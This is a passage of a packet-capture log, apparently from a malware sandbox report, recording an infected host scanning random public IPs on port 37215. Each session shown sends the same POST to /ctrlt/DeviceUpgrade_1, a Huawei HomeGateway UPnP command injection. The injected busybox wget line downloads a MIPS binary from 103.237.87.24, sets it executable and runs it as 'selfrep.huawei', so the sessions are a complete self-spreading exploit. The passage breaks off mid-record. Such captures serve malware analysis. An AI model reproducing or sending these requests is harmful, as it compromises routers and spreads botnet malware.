6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  775192.168.2.134433641.88.231.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355046988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  776192.168.2.1336940114.96.61.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355065107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  777192.168.2.135058863.38.114.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355150938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  778192.168.2.1338342197.77.120.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355150938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  779192.168.2.1348826157.171.209.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355185986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  780192.168.2.135256864.62.48.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355186939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  781192.168.2.133402241.36.151.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355365992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  782192.168.2.1344312129.176.240.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358383894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  783192.168.2.134548241.182.174.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358438015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  784192.168.2.1351554199.75.127.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358439922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  785192.168.2.1353908157.190.95.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358458996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
